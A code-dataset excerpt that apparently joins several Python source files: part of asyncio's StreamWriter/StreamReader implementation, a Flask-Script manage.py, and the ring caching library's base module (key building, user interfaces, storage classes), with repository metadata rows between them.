self._protocol = protocol
# drain() expects that the reader has an exception() method
assert reader is None or isinstance(reader, StreamReader)
self._reader = reader
self._loop = loop
self._complete_fut = self._loop.create_future()
self._complete_fut.set_result(None)
def __repr__(self):
info = [self.__class__.__name__, f'transport={self._transport!r}']
if self._reader is not None:
info.append(f'reader={self._reader!r}')
return '<{}>'.format(' '.join(info))
@property
def transport(self):
return self._transport
def write(self, data):
self._transport.write(data)
def writelines(self, data):
self._transport.writelines(data)
def write_eof(self):
return self._transport.write_eof()
def can_write_eof(self):
return self._transport.can_write_eof()
def close(self):
return self._transport.close()
def is_closing(self):
return self._transport.is_closing()
async def wait_closed(self):
await self._protocol._get_close_waiter(self)
def get_extra_info(self, name, default=None):
return self._transport.get_extra_info(name, default)
async def drain(self):
"""Flush the write buffer.
The intended use is to write
w.write(data)
await w.drain()
"""
if self._reader is not None:
exc = self._reader.exception()
if exc is not None:
raise exc
if self._transport.is_closing():
# Wait for protocol.connection_lost() call
# Raise connection closing error if any,
# ConnectionResetError otherwise
# Yield to the event loop so connection_lost() may be
# called. Without this, _drain_helper() would return
# immediately, and code that calls
# write(...); await drain()
# in a loop would never call connection_lost(), so it
# would not see an error when the socket is closed.
await sleep(0)
await self._protocol._drain_helper()
class StreamReader:
_source_traceback = None
def __init__(self, limit=_DEFAULT_LIMIT, loop=None):
# The line length limit is a security feature;
# it also doubles as half the buffer limit.
if limit <= 0:
raise ValueError('Limit cannot be <= 0')
self._limit = limit
if loop is None:
self._loop = events.get_event_loop()
else:
self._loop = loop
self._buffer = bytearray()
self._eof = False # Whether we're done.
self._waiter = None # A future used by _wait_for_data()
self._exception = None
self._transport = None
self._paused = False
if self._loop.get_debug():
self._source_traceback = format_helpers.extract_stack(
sys._getframe(1))
def __repr__(self):
info = ['StreamReader']
if self._buffer:
info.append(f'{len(self._buffer)} bytes')
if self._eof:
info.append('eof')
if self._limit != _DEFAULT_LIMIT:
info.append(f'limit={self._limit}')
if self._waiter:
info.append(f'waiter={self._waiter!r}')
if self._exception:
info.append(f'exception={self._exception!r}')
if self._transport:
info.append(f'transport={self._transport!r}')
if self._paused:
info.append('paused')
return '<{}>'.format(' '.join(info))
def exception(self):
return self._exception
def set_exception(self, exc):
self._exception = exc
waiter = self._waiter
if waiter is not None:
self._waiter = None
if not waiter.cancelled():
waiter.set_exception(exc)
def _wakeup_waiter(self):
"""Wakeup read*() functions waiting for data or EOF."""
waiter = self._waiter
if waiter is not None:
self._waiter = None
if not waiter.cancelled():
waiter.set_result(None)
def set_transport(self, transport):
assert self._transport is None, 'Transport already set'
self._transport = transport
def _maybe_resume_transport(self):
if self._paused and len(self._buffer) <= self._limit:
self._paused = False
self._transport.resume_reading()
def feed_eof(self):
self._eof = True
self._wakeup_waiter()
def at_eof(self):
"""Return True if the buffer is empty and 'feed_eof' was called."""
return self._eof and not self._buffer
def feed_data(self, data):
assert not self._eof, 'feed_data after feed_eof'
if not data:
return
self._buffer.extend(data)
self._wakeup_waiter()
if (self._transport is not None and
not self._paused and
len(self._buffer) > 2 * self._limit):
try:
self._transport.pause_reading()
except NotImplementedError:
# The transport can't be paused.
# We'll just have to buffer all data.
# Forget the transport so we don't keep trying.
self._transport = None
else:
self._paused = True
async def _wait_for_data(self, func_name):
"""Wait until feed_data() or feed_eof() is called.
If stream was paused, automatically resume it.
"""
# StreamReader uses a future to link the protocol feed_data() method
# to a read coroutine. Running two read coroutines at the same time
# would have an unexpected behaviour. It would not possible to know
# which coroutine would get the next data.
if self._waiter is not None:
raise RuntimeError(
f'{func_name}() called while another coroutine is '
f'already waiting for incoming data')
assert not self._eof, '_wait_for_data after EOF'
# Waiting for data while paused will make deadlock, so prevent it.
# This is essential for readexactly(n) for case when n > self._limit.
if self._paused:
self._paused = False
self._transport.resume_reading()
self._waiter = self._loop.create_future()
try:
await self._waiter
finally:
self._waiter = None
async def readline(self):
"""Read chunk of data from the stream until newline (b'\n') is found.
On success, return chunk that ends with newline. If only partial
line can be read due to EOF, return incomplete line without
terminating newline. When EOF was reached while no bytes read, empty
bytes object is returned.
If limit is reached, ValueError will be raised. In that case, if
newline was found, complete line including newline will be removed
from internal buffer. Else, internal buffer will be cleared. Limit is
compared against part of the line without newline.
If stream was paused, this function will automatically resume it if
needed.
"""
sep = b'\n'
seplen = len(sep)
try:
line = await self.readuntil(sep)
except exceptions.IncompleteReadError as e:
return e.partial
except exceptions.LimitOverrunError as e:
if self._buffer.startswith(sep, e.consumed):
del self._buffer[:e.consumed + seplen]
else:
self._buffer.clear()
self._maybe_resume_transport()
raise ValueError(e.args[0])
return line
async def readuntil(self, separator=b'\n'):
"""Read data from the stream until ``separator`` is found.
On success, the data and separator will be removed from the
internal buffer (consumed). Returned data will include the
separator at the end.
Configured stream limit is used to check result. Limit sets the
maximal length of data that can be returned, not counting the
separator.
If an EOF occurs and the complete separator is still not found,
an IncompleteReadError exception will be raised, and the internal
buffer will be reset. The IncompleteReadError.partial attribute
may contain the separator partially.
If the data cannot be read because of over limit, a
LimitOverrunError exception will be raised, and the data
will be left in the internal buffer, so it can be read again.
"""
seplen = len(separator)
if seplen == 0:
raise ValueError('Separator should be at least one-byte string')
if self._exception is not None:
raise self._exception
# Consume whole buffer except last bytes, which length is
# one less than seplen. Let's check corner cases with
# separator='SEPARATOR':
# * we have received almost complete separator (without last
# byte). i.e buffer='some textSEPARATO'. In this case we
# can safely consume len(separator) - 1 bytes.
# * last byte of buffer is first byte of separator, i.e.
# buffer='abcdefghijklmnopqrS'. We may safely consume
# everything except that last byte, but this require to
# analyze bytes of buffer that match partial separator.
# This is slow and/or require FSM. For this case our
# implementation is not optimal, since require rescanning
# of data that is known to not belong to separator. In
# real world, separator will not be so long to notice
# performance problems. Even when reading MIME-encoded
# messages :)
# `offset` is the number of bytes from the beginning of the buffer
# where there is no occurrence of `separator`.
offset = 0
# Loop until we find `separator` in the buffer, exceed the buffer size,
# or an EOF has happened.
while True:
buflen = len(self._buffer)
# Check if we now have enough data in the buffer for `separator` to
# fit.
if buflen - offset >= seplen:
isep = self._buffer.find(separator, offset)
if isep != -1:
# `separator` is in the buffer. `isep` will be used later
# to retrieve the data.
break
# see upper comment for explanation.
offset = buflen + 1 - seplen
if offset > self._limit:
raise exceptions.LimitOverrunError(
'Separator is not found, and chunk exceed the limit',
offset)
# Complete message (with full separator) may be present in buffer
# even when EOF flag is set. This may happen when the last chunk
# adds data which makes separator be found. That's why we check for
# EOF *ater* inspecting the buffer.
if self._eof:
chunk = bytes(self._buffer)
self._buffer.clear()
raise exceptions.IncompleteReadError(chunk, None)
# _wait_for_data() will resume reading if stream was paused.
await self._wait_for_data('readuntil')
if isep > self._limit:
raise exceptions.LimitOverrunError(
'Separator is found, but chunk is longer than limit', isep)
chunk = self._buffer[:isep + seplen]
del self._buffer[:isep + seplen]
self._maybe_resume_transport()
return bytes(chunk)
async def read(self, n=-1):
"""Read up to `n` bytes from the stream.
If n is not provided, or set to -1, read until EOF and return all read
bytes. If the EOF was received and the internal buffer is empty, return
an empty bytes object.
If n is zero, return empty bytes object immediately.
If n is positive, this function try to read `n` bytes, and may return
less or equal bytes than requested, but at least one byte. If EOF was
received before any byte is read, this function returns empty byte
object.
Returned value is not limited with limit, configured at stream
creation.
If stream was paused, this function will automatically resume it if
needed.
"""
if self._exception is not None:
raise self._exception
if n == 0:
return b''
if n < 0:
# This used to just loop creating a new waiter hoping to
# collect everything in self._buffer, but that would
# deadlock if the subprocess sends more than self.limit
# bytes. So just call self.read(self._limit) until EOF.
blocks = []
while True:
block = await self.read(self._limit)
if not block:
break
blocks.append(block)
return b''.join(blocks)
if not self._buffer and not self._eof:
await self._wait_for_data('read')
# This will work right even if buffer is less than n bytes
data = bytes(self._buffer[:n])
del self._buffer[:n]
self._maybe_resume_transport()
return data
async def readexactly(self, n):
"""Read exactly `n` bytes.
Raise an IncompleteReadError if EOF is reached before `n` bytes can be
read. The IncompleteReadError.partial attribute of the exception will
contain the partial read bytes.
if n is zero, return empty bytes object.
Returned value is not limited with limit, configured at stream
creation.
If stream was paused, this function will automatically resume it if
needed.
"""
if n < 0:
raise ValueError('readexactly size can not be less than zero')
if self._exception is not None:
raise self._exception
if n == 0:
return b''
while len(self._buffer) < n:
if self._eof:
incomplete = bytes(self._buffer)
self._buffer.clear()
raise exceptions.IncompleteReadError(incomplete, n)
await self._wait_for_data('readexactly')
if len(self._buffer) == n:
data = bytes(self._buffer)
self._buffer.clear()
else:
data = bytes(self._buffer[:n])
del self._buffer[:n]
self._maybe_resume_transport()
return data
def __aiter__(self):
return self
async def __anext__(self):
val = await self.readline()
if val == b'':
raise StopAsyncIteration
return val
| 36.023715 | 79 | 0.608478 |
79553137b47037f4032bdf73042a0df2a8bed8d0 | 231 | py | Python | manage.py | bintadam/DailyNewsApp | 3bed025cd53aa3dab83de4cf7425203506f48951 | [
"MIT"
] | null | null | null | manage.py | bintadam/DailyNewsApp | 3bed025cd53aa3dab83de4cf7425203506f48951 | [
"MIT"
] | null | null | null | manage.py | bintadam/DailyNewsApp | 3bed025cd53aa3dab83de4cf7425203506f48951 | [
"MIT"
] | null | null | null | from app import create_app
from flask_script import Manager, Server
# Creating app instance
app = create_app('development')
manager = Manager(app)
manager.add_command('server',Server)
if __name__ == '__main__':
manager.run() | 21 | 40 | 0.761905 |
7955318357c5715d20c7c5e780a16b8a272ad7d6 | 32,628 | py | Python | ring/func/base.py | machenity/ring | a44aa375e45e09f33e2a48067cfeafdde07a8bad | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | ring/func/base.py | machenity/ring | a44aa375e45e09f33e2a48067cfeafdde07a8bad | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | ring/func/base.py | machenity/ring | a44aa375e45e09f33e2a48067cfeafdde07a8bad | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | """:mod:`ring.func.base` --- The building blocks of **ring.func.\***.
=====================================================================
""" # noqa: W605
import abc
import types
from typing import List
import six
from wirerope import Wire, WireRope, RopeCore
from .._compat import functools, qualname
from ..callable import Callable
from ..key import CallableKey
from ..coder import registry as default_registry
try:
import numpy as np
except ImportError:
np = None
try:
import dataclasses
except ImportError: # pragma: no cover
dataclasses = None
__all__ = (
'factory', 'NotFound',
'BaseUserInterface', 'BaseStorage', 'CommonMixinStorage', 'StorageMixin')
def suggest_ignorable_keys(c, ignorable_keys):
if ignorable_keys is None:
_ignorable_keys = []
else:
_ignorable_keys = ignorable_keys
return _ignorable_keys
def suggest_key_prefix(c, key_prefix):
if key_prefix is None:
key_prefix = c.identifier
if six.PY2:
cc = c.wrapped_callable
# A proper solution is `im_class` of the bound method
if c.is_membermethod:
key_prefix = \
'{0.__module__}.{{self.__class__.__name__}}.{0.__name__}' \
.format(cc)
elif c.is_classmethod:
key_prefix = '{0.__module__}.{{cls}}.{0.__name__}'.format(cc)
else:
key_prefix = key_prefix.replace('{', '{{').replace('}', '}}')
return key_prefix
def _coerce_bypass(v):
return v
def _coerce_list_and_tuple(v):
return str(v).replace(' ', '')
def _coerce_type(v):
return v.__name__
def _coerce_dict(v):
return ','.join(['{},{}'.format(k, v[k]) for k in sorted(v.keys())])
def _coerce_set(v):
return ','.join(sorted(v))
def _coerce_ring_key(v):
return v.__ring_key__()
def _coerce_dataclass(v):
return type(v).__name__ + _coerce_dict(dataclasses.asdict(v))
@functools.lru_cache(maxsize=128)
def coerce_function(t):
if hasattr(t, '__ring_key__'):
return _coerce_ring_key
if issubclass(t, (int, str, bool, type(None), type(Ellipsis))):
return _coerce_bypass
if issubclass(t, (list, tuple)):
return _coerce_list_and_tuple
if t == type:
return _coerce_type
if issubclass(t, dict):
return _coerce_dict
if issubclass(t, (set, frozenset)):
return _coerce_set
if np:
if issubclass(t, np.ndarray):
return _coerce_list_and_tuple
if dataclasses:
if dataclasses.is_dataclass(t):
return _coerce_dataclass
# NOTE: general sequence processing is good -
# but NEVER add a general iterator processing. it will cause user bugs.
def coerce(v, in_memory_storage):
"""Transform the given value to cache-friendly string data."""
type_coerce = coerce_function(type(v))
if type_coerce:
return type_coerce(v)
if hasattr(v, '__ring_key__'):
return v.__ring_key__()
if in_memory_storage and type(v).__hash__ != object.__hash__:
return "{}:hash:{}".format(qualname(type(v)), hash(v))
cls = v.__class__
if cls.__str__ != object.__str__:
return str(v)
msg = "Add __ring_key__() or __str__()."
if in_memory_storage:
msg = "Add __ring_key__(), __str__() or __hash__()."
raise TypeError(
"The given value '{}' of type '{}' is not a key-compatible type. {}".format(v, cls, msg))
def create_key_builder(
c, key_prefix, ignorable_keys, coerce=coerce, encoding=None,
key_refactor=None, in_memory_storage=False):
assert isinstance(c, Callable)
key_generator = CallableKey(
c, format_prefix=key_prefix, ignorable_keys=ignorable_keys)
def compose_key(*bound_args, **kwargs):
full_kwargs = kwargs.copy()
for i, prearg in enumerate(bound_args):
full_kwargs[c.parameters[i].name] = bound_args[i]
coerced_kwargs = {
k: coerce(v, in_memory_storage) for k, v in full_kwargs.items()
if k not in ignorable_keys}
key = key_generator.build(coerced_kwargs)
if encoding:
key = key.encode(encoding)
if key_refactor:
key = key_refactor(key)
return key
return compose_key
def interface_attrs(**kwargs):
if 'return_annotation' in kwargs:
kwargs['__annotations_override__'] = {
'return': kwargs.pop('return_annotation')}
if 'transform_args' in kwargs:
transform_args = kwargs.pop('transform_args')
if transform_args:
if type(transform_args) != tuple:
transform_args = transform_args, {}
func, rules = transform_args
assert frozenset(rules.keys()) <= frozenset({'prefix_count'})
kwargs['transform_args'] = transform_args
assert frozenset(kwargs.keys()) <= frozenset(
{'transform_args', '__annotations_override__'})
def _decorator(f):
f.__dict__.update(kwargs)
return f
return _decorator
def transform_kwargs_only(wire, rules, args, kwargs):
"""`transform_args` for basic single-access methods in interfaces.
Create and returns uniform fully keyword-annotated arguments except for
the first ``rule.get('prefix_count')`` number of positional arguments for
given actual arguments of ring wires. So that the interface programmers
can concentrate on the logic of the interface - not on the details of
argument handling.
This function is the argument of `transform_args` parameter of
:func:`ring.func.base.interface_attrs` decorator for ordinary
single-access methods.
:param int rules.prefix_count: The number of prefix parameters. When it is
a positive integer, the transform function will skip the
first `prefix_count` number of positional arguments when it composes
the fully keyword-annotated arguments. Use this to allow a method has
the exact `prefix_count` number of additional *method parameters*.
The default value is ``0``.
:return: The fully keyword-annotated arguments.
:rtype: dict
:see: the source code of :class:`ring.func.base.BaseUserInterface` about
actual usage.
"""
prefix_count = rules.get('prefix_count', 0)
wrapper_args = args[:prefix_count]
function_args = args[prefix_count:]
full_kwargs = wire._merge_args(function_args, kwargs)
return wrapper_args, full_kwargs
@six.add_metaclass(abc.ABCMeta)
class BaseUserInterface(object):
"""The base user interface class for single item access.
An instance of interface class is bound to a **Ring** object. They have
the one-to-one relationship. Subclass this class to create a new user
interface. This is an abstract class. The methods marked as
:func:`abc.abstractmethod` are mandatory; Otherwise not.
This class provides sub-functions of ring wires. When trying to access
any sub-function of a ring wire which doesn't exist, it looks up
the composed user interface object and creates actual sub-function
into the ring wire.
The parameter *transform_args* in :func:`ring.func.base.interface_attrs`
defines the figure of method parameters. For the **BaseUserInterface**,
every method's *transform_args* is
:func:`ring.func.base.transform_kwargs_only` which force to pass uniform
keyword arguments to the interface methods.
Other mix-ins or subclasses may have different *transform_args*.
The first parameter of interface method *always* is a **RingWire** object.
The other parameters are composed by *transform_args*.
:see: :func:`ring.func.base.transform_kwargs_only` for the specific
argument transformation rule for each methods.
The parameters below describe common methods' parameters.
:param ring.func.base.RingWire wire: The corresponding ring
wire object.
:param Dict[str,Any] kwargs: Fully keyword-annotated arguments. When
actual function arguments are passed to each sub-function of the
wire, they are merged into the form of keyword arguments. This gives
the consistent interface for arguments handling. Note that it only
describes the methods' *transform_args* attribute is
:func:`ring.func.base.transform_kwargs_only`
"""
def __init__(self, rope):
self.rope = rope
@interface_attrs(
transform_args=transform_kwargs_only, return_annotation=str)
def key(self, wire, **kwargs):
"""Create and return the composed key for storage.
:see: The class documentation for the parameter details.
:return: The composed key with given arguments.
:rtype: str
"""
return self.rope.compose_key(*wire._bound_objects, **kwargs)
@interface_attrs(transform_args=transform_kwargs_only)
def execute(self, wire, **kwargs):
"""Execute and return the result of the original function.
:see: The class documentation for the parameter details.
:return: The result of the original function.
"""
return wire.__func__(**kwargs)
@abc.abstractmethod
@interface_attrs(transform_args=transform_kwargs_only)
def get(self, wire, **kwargs): # pragma: no cover
"""Try to get and return the storage value of the corresponding key.
:see: The class documentation for the parameter details.
:see: :meth:`ring.func.base.BaseUserInterface.key` for the key.
:return: The storage value for the corresponding key if it exists;
Otherwise, the `miss_value` of **Ring** object.
"""
raise NotImplementedError
@interface_attrs(
transform_args=(transform_kwargs_only, {'prefix_count': 1}))
def set(self, wire, value, **kwargs): # pragma: no cover
"""Set the storage value of the corresponding key as the given `value`.
:see: :meth:`ring.func.base.BaseUserInterface.key` for the key.
:see: The class documentation for common parameter details.
:param Any value: The value to save in the storage.
:rtype: None
"""
raise NotImplementedError
@abc.abstractmethod
@interface_attrs(transform_args=transform_kwargs_only)
def update(self, wire, **kwargs): # pragma: no cover
"""Execute the original function and `set` the result as the value.
This action is comprehensible as a concatenation of
:meth:`ring.func.base.BaseUserInterface.execute` and
:meth:`ring.func.base.BaseUserInterface.set`.
:see: :meth:`ring.func.base.BaseUserInterface.key` for the key.
:see: :meth:`ring.func.base.BaseUserInterface.execute` for the
execution.
:see: The class documentation for the parameter details.
:return: The result of the original function.
"""
raise NotImplementedError
@abc.abstractmethod
@interface_attrs(transform_args=transform_kwargs_only)
def get_or_update(self, wire, **kwargs): # pragma: no cover
"""Try to get and return the storage value; Otherwise, update and so.
:see: :meth:`ring.func.base.BaseUserInterface.get` for get.
:see: :meth:`ring.func.base.BaseUserInterface.update` for update.
:see: The class documentation for the parameter details.
:return: The storage value for the corresponding key if it exists;
Otherwise result of the original function.
"""
raise NotImplementedError
@abc.abstractmethod
@interface_attrs(transform_args=transform_kwargs_only)
def delete(self, wire, **kwargs): # pragma: no cover
"""Delete the storage value of the corresponding key.
:see: :meth:`ring.func.base.BaseUserInterface.key` for the key.
:see: The class documentation for the parameter details.
:rtype: None
"""
raise NotImplementedError
@interface_attrs(transform_args=transform_kwargs_only)
def has(self, wire, **kwargs): # pragma: no cover
"""Return whether the storage has a value of the corresponding key.
This is an optional function.
:see: :meth:`ring.func.base.BaseUserInterface.key` for the key.
:see: The class documentation for the parameter details.
:return: Whether the storage has a value of the corresponding key.
:rtype: bool
"""
raise NotImplementedError
@interface_attrs(transform_args=transform_kwargs_only)
def touch(self, wire, **kwargs): # pragma: no cover
"""Touch the storage value of the corresponding key.
This is an optional function.
:note: `Touch` means resetting the expiration.
:see: :meth:`ring.func.base.BaseUserInterface.key` for the key.
:see: The class documentation for the parameter details.
:rtype: bool
"""
raise NotImplementedError
def create_bulk_key(interface, wire, args):
if isinstance(args, tuple):
kwargs = wire._merge_args(args, {})
return interface.key(wire, **kwargs)
elif isinstance(args, dict):
return interface.key(wire, **args)
else:
raise TypeError(
"Each parameter of '_many' suffixed sub-functions must be an "
"instance of 'tuple' or 'dict'")
def execute_bulk_item(wire, args):
if isinstance(args, tuple):
return wire.__func__(*args)
elif isinstance(args, dict):
return wire.__func__(**args)
else:
raise TypeError(
"Each parameter of '_many' suffixed sub-functions must be an "
"instance of 'tuple' or 'dict'")
class AbstractBulkUserInterfaceMixin(object):
"""Bulk access interface mixin.
Every method in this mixin is optional. The methods have each
corresponding function in :class:`ring.func.base.BaseUserInterface`.
The parameters below describe common methods' parameters.
:param ring.func.base.RingWire wire: The corresponding ring
wire object.
:param Iterable[Union[tuple,dict]] args_list: A sequence of arguments of
the original function. While **args_list** is a list of **args**,
each **args** (:class:`Union[tuple,dict]`) is a complete set of
positional-only formed or keyword-only formed arguments.
When the **args** (:class:`tuple`) is positional-only formed, its type
must be always :class:`tuple`. Any other iterable types like `list`
are not allowed. When any keyword-only argument is required, use
keyword-only formed arguments.
When the **args** (:class:`dict`) is keyword-only formed, its type must
be always :class:`dict`. When there is a variable-length positional
argument, pass the values them as a :class:`tuple` of parameters
with the corresponding variable-length positional parameter name.
The restriction gives the simple and consistent interface for
multiple dispatching. Note that it only describes the methods which
don't have *transform_args* attribute.
"""
@interface_attrs(return_annotation=lambda a: List[str])
def key_many(self, wire, *args_list):
"""Create and return the composed keys for storage.
:see: The class documentation for the parameter details.
:return: A sequence of created keys.
:rtype: Sequence[str]
"""
return [create_bulk_key(self, wire, args) for args in args_list]
def execute_many(self, wire, *args_list): # pragma: no cover
"""Execute and return the results of the original function.
:see: The class documentation for the parameter details.
:return: A sequence of the results of the original function.
:rtype: Sequence of the return type of the original function
"""
raise NotImplementedError
def get_many(self, wire, *args_list): # pragma: no cover
"""Try to get and returns the storage values.
:see: The class documentation for the parameter details.
:return: A sequence of the storage values or `miss_value` for the
corresponding keys. When a key exists in the storage, the matching
value is selected; Otherwise the `miss_value` of **Ring** object
is.
"""
raise NotImplementedError
def update_many(self, wire, *args_list): # pragma: no cover
"""Execute the original function and `set` the result as the value.
:see: The class documentation for the parameter details.
:return: A sequence of the results of the original function.
:rtype: Sequence of the return type of the original function
"""
raise NotImplementedError
def get_or_update_many(self, wire, *args_list): # pragma: no cover
"""Try to get and returns the storage values.
:note: The semantics of this function may vary by the implementation.
:see: The class documentation for the parameter details.
:return: A sequence of the storage values or the executed result of the
original function for the corresponding keys. When a key exists
in the storage, the matching value is selected; Otherwise, the
result of the original function is.
"""
raise NotImplementedError
def set_many(self, wire, args_list, value_list): # pragma: no cover
"""Set the storage values of the corresponding keys as the given values.
:see: The class documentation for common parameter details.
:param Iterable[Any] value_list: A list of the values to save in
the storage.
:rtype: None
"""
raise NotImplementedError
def delete_many(self, wire, *args_list): # pragma: no cover
"""Delete the storage values of the corresponding keys.
:see: The class documentation for the parameter details.
:rtype: None
"""
raise NotImplementedError
def has_many(self, wire, *args_list): # pragma: no cover
"""Return whether the storage has values of the corresponding keys.
:see: The class documentation for the parameter details.
:rtype: Sequence[bool]
"""
raise NotImplementedError
def touch_many(self, wire, *args_list): # pragma: no cover
"""Touch the storage values of the corresponding keys.
:see: The class documentation for the parameter details.
:rtype: None
"""
raise NotImplementedError
class RingWire(Wire):
__slots__ = ('storage', )
def __init__(self, rope, *args, **kwargs):
super(RingWire, self).__init__(rope, *args, **kwargs)
self.storage = rope.storage
def encode(self, v):
return self._rope.encode(v)
def decode(self, v):
return self._rope.decode(v)
def _merge_args(self, args, kwargs):
"""Create a fake kwargs object by merging actual arguments.
The merging follows the signature of wrapped function and current
instance.
"""
# TODO: self._bound_objects must be empty for non-binding functions
if type(self.__func__) is types.FunctionType: # noqa
bound_args = ()
else:
bound_args = range(len(self._bound_objects))
full_kwargs = self._callable.kwargify(
args, kwargs, bound_args=bound_args)
return full_kwargs
def run(self, action, *args, **kwargs):
attr = getattr(self, action)
return attr(*args, **kwargs)
class PublicRing(object):
def __init__(self, rope):
self._rope = rope
def key(self, func):
self._rope.compose_key = func
def encode(self, func):
self._rope.encode = func
def decode(self, func):
self._rope.decode = func
def factory(
storage_backend, # actual storage
key_prefix, # manual key prefix
expire_default, # default expiration
# keyword-only arguments from here
# building blocks
coder, miss_value, user_interface, storage_class,
default_action=Ellipsis,
coder_registry=Ellipsis,
# callback
on_manufactured=None,
# optimization
wire_slots=Ellipsis,
# key builder related parameters
ignorable_keys=None, key_encoding=None, key_refactor=None):
"""Create a decorator which turns a function into ring wire or wire bridge.
This is the base factory function that every internal **Ring** factories
are based on. See the source code of :mod:`ring.func.sync` or
:mod:`ring.func.asyncio` for actual usages and sample code.
:param Any storage_backend: Actual storage backend instance.
:param Optional[str] key_prefix: Specify storage key prefix when a
:class:`str` value is given; Otherwise a key prefix is automatically
suggested based on the function signature. Note that the suggested
key prefix is not compatible between Python 2 and 3.
:param Optional[float] expire_default: Set the duration of seconds to
expire the data when a number is given; Otherwise the default
behavior depends on the backend. Note that the storage may or may
not support expiration or persistent saving.
:param Union[str,ring.coder.Coder] coder: A registered coder name or a
coder object. See :doc:`coder` for details.
:param Any miss_value: The default value when storage misses a given key.
:param type user_interface: Injective implementation of sub-functions.
:param type storage_class: Injective implementation of storage.
:param Optional[str] default_action: The default action name for
`__call__` of the wire object. When the given value is :data:`None`,
there is no `__call__` method for ring wire.
:param Optional[ring.coder.Registry] coder_registry: The coder registry
to load the given `coder`. The default value is
:data:`ring.coder.registry` when :data:`None` is given.
:param Optional[Callable[[type(Wire),type(Ring)],None]] on_manufactured:
The callback function when a new ring wire or wire bridge is created.
:param List[str] ignorable_keys: (experimental) Parameter names not to
use to create storage key.
:param Optional[str] key_encoding: The storage key is usually
:class:`str` typed. When this parameter is given, a key is encoded
into :class:`bytes` using the given encoding.
:param Optional[Callable[[str],str]] key_refactor: Roughly,
``key = key_refactor(key)`` will be run when `key_refactor` is not
:data:`None`; Otherwise it is omitted.
:return: The factory decorator to create new ring wire or wire bridge.
:rtype: (Callable)->ring.wire.RopeCore
"""
if wire_slots is Ellipsis:
wire_slots = ()
if default_action is Ellipsis:
default_action = 'get_or_update'
if coder_registry is Ellipsis:
coder_registry = default_registry
raw_coder = coder
ring_coder = coder_registry.get_or_coderize(raw_coder)
if isinstance(user_interface, (tuple, list)):
user_interface = type('_ComposedUserInterface', user_interface, {})
def _decorator(f):
_storage_class = storage_class
class RingRope(RopeCore):
coder = ring_coder
user_interface_class = user_interface
storage_class = _storage_class
def __init__(self, *args, **kwargs):
super(RingRope, self).__init__(*args, **kwargs)
self.user_interface = self.user_interface_class(self)
self.storage = self.storage_class(self, storage_backend)
_ignorable_keys = suggest_ignorable_keys(
self.callable, ignorable_keys)
_key_prefix = suggest_key_prefix(self.callable, key_prefix)
in_memory_storage = hasattr(self.storage, 'in_memory_storage')
self.compose_key = create_key_builder(
self.callable, _key_prefix, _ignorable_keys,
encoding=key_encoding, key_refactor=key_refactor, in_memory_storage=in_memory_storage)
self.compose_key.ignorable_keys = _ignorable_keys
self.encode = self.coder.encode
self.decode = self.coder.decode
self.ring = PublicRing(self)
func = f if type(f) is types.FunctionType else Callable(f).wrapped_callable # noqa
interface_keys = tuple(k for k in dir(user_interface) if k[0] != '_')
class _RingWire(RingWire):
if wire_slots is not False:
assert isinstance(wire_slots, tuple)
__slots__ = interface_keys + wire_slots
def _on_property(self):
return self.run(self._rope.default_action)
if default_action:
@functools.wraps(func)
def __call__(self, *args, **kwargs):
return self.run(self._rope.default_action, *args, **kwargs)
def __getattr__(self, name):
try:
return super(RingWire, self).__getattr__(name)
except AttributeError:
pass
try:
return self.__getattribute__(name)
except AttributeError:
pass
attr = getattr(self._rope.user_interface, name)
if callable(attr):
transform_args = getattr(
attr, 'transform_args', None)
def impl_f(*args, **kwargs):
if transform_args:
transform_func, transform_rules = transform_args
args, kwargs = transform_func(
self, transform_rules, args, kwargs)
return attr(self, *args, **kwargs)
cc = self._callable.wrapped_callable
functools.wraps(cc)(impl_f)
impl_f.__name__ = '.'.join((cc.__name__, name))
if six.PY34:
impl_f.__qualname__ = '.'.join((cc.__qualname__, name))
annotations = getattr(
impl_f, '__annotations__', {})
annotations_override = getattr(
attr, '__annotations_override__', {})
for field, override in annotations_override.items():
if isinstance(override, types.FunctionType):
new_annotation = override(annotations)
else:
new_annotation = override
annotations[field] = new_annotation
setattr(self, name, impl_f)
return self.__getattribute__(name)
wire_rope = WireRope(_RingWire, RingRope)
strand = wire_rope(f)
strand.miss_value = miss_value
strand.expire_default = expire_default
strand.default_action = default_action
if on_manufactured is not None:
on_manufactured(wire_rope=strand)
return strand
return _decorator
class NotFound(Exception):
"""Internal exception for a cache miss.
Ring internally use this exception to indicate a cache miss. Though common
convention of the cache miss is :data:`None` for many implementations,
:mod:`ring.coder` allows :data:`None` to be proper cached value in
**Ring**.
"""
class BaseStorage(object):
"""Base storage interface.
To add a new storage interface, regard to use
:class:`ring.func.base.CommonMixinStorage` and a subclass of
:class:`ring.func.base.StorageMixin`.
When subclassing this interface, remember `get` and `set` methods must
include coder works. The methods marked as :func:`abc.abstractmethod`
are mandatory; Otherwise not.
"""
def __init__(self, rope, backend):
self.rope = rope
self.backend = backend
@abc.abstractmethod
def get(self, key): # pragma: no cover
"""Get actual data by given key."""
raise NotImplementedError
@abc.abstractmethod
def set(self, key, value, expire=Ellipsis): # pragma: no cover
"""Set actual data by given key, value and expire."""
raise NotImplementedError
@abc.abstractmethod
def delete(self, key): # pragma: no cover
"""Delete data by given key."""
raise NotImplementedError
@abc.abstractmethod
def has(self, key): # pragma: no cover
"""Check data exists for given key."""
raise NotImplementedError
@abc.abstractmethod
def touch(self, key, expire=Ellipsis): # pragma: no cover
"""Touch data by given key."""
raise NotImplementedError
class CommonMixinStorage(BaseStorage):
"""General storage root for StorageMixin."""
def get(self, key):
value = self.get_value(key)
return self.rope.decode(value)
def set(self, key, value, expire=Ellipsis):
if expire is Ellipsis:
expire = self.rope.expire_default
encoded = self.rope.encode(value)
result = self.set_value(key, encoded, expire)
return result
def delete(self, key):
result = self.delete_value(key)
return result
def has(self, key):
result = self.has_value(key)
return result
def touch(self, key, expire=Ellipsis):
if expire is Ellipsis:
expire = self.rope.expire_default
result = self.touch_value(key, expire)
return result
class StorageMixin(object):
"""Abstract storage mixin class.
Subclass this class to create a new storage mixin. The methods marked
as :func:`abc.abstractmethod` are mandatory; Otherwise not.
"""
@abc.abstractmethod
def get_value(self, key): # pragma: no cover
"""Get and return value for the given key."""
raise NotImplementedError
@abc.abstractmethod
def set_value(self, key, value, expire): # pragma: no cover
"""Set value for the given key, value and expire."""
raise NotImplementedError
@abc.abstractmethod
def delete_value(self, key): # pragma: no cover
"""Delete value for the given key."""
raise NotImplementedError
def has_value(self, key):
"""Check and return data existences for the given key. (optional)"""
